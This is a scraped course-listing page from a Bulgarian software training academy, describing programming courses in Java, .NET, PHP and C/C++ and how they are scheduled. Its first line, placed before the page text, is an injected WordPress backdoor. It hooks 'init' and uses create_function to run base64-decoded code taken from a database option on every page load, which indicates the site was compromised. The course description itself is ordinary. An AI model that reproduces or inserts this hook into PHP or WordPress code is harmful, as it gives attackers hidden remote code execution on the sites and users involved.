add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Курсове - НАРС

Курсове

От създаването си през 2005 г. Националната академия по разработка на софтуер (НАРС) и Центърът за Професионално Обучение (ЦПО) към НАРС предлагат разнообразие от специализирани курсове по програмиране и съвременни софтуерни технологии.

Програмите за всеки един курс се разработват от специалисти на НАРС. Обучението се води от опитни преподаватели с практически опит в съответните области.

Курсовете се провеждат в залите на Националната академия по разработка на софтуер, които са оборудвани със съвременна компютърна и мултимедийна техника.

НАРС предлага разнообразие от курсове по програмиране и софтуерни технологии, предназначени както за начинаещи, така и за разработчици с дългогодишен опит.

Курсовете за начинаещи се предлагат периодично, през около месец. Курсовете за напреднали се провеждат след приключване на начален курс, периодично през около два месеца.

Обученията се предлагат и в индивидуална форма – във време и график удобни за обучавания*.
*Графикът за индивидуалните обучения се съгласува спрямо свободните слотове в НАРС. За повече информация, моля свържете се с нас.

Начални

Java

.NET

PHP and MySQL

C/C++

Quality Assurance

Java Technologies

  • Swing
  • Hibernate
  • Spring Framework
  • JSON
  • JSF + Web Services

Web Sites Development

За специализирани обучения в направленията – Java Database and ORM Java Framework Course, Java Web Programming Course, Java Enterprise Edition Course, Java Software Engineering and Team Working Course, .NET Database Development, ASP.NET Development и .NET Software Engineering and Team Working Course, моля свържете се с нас.

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad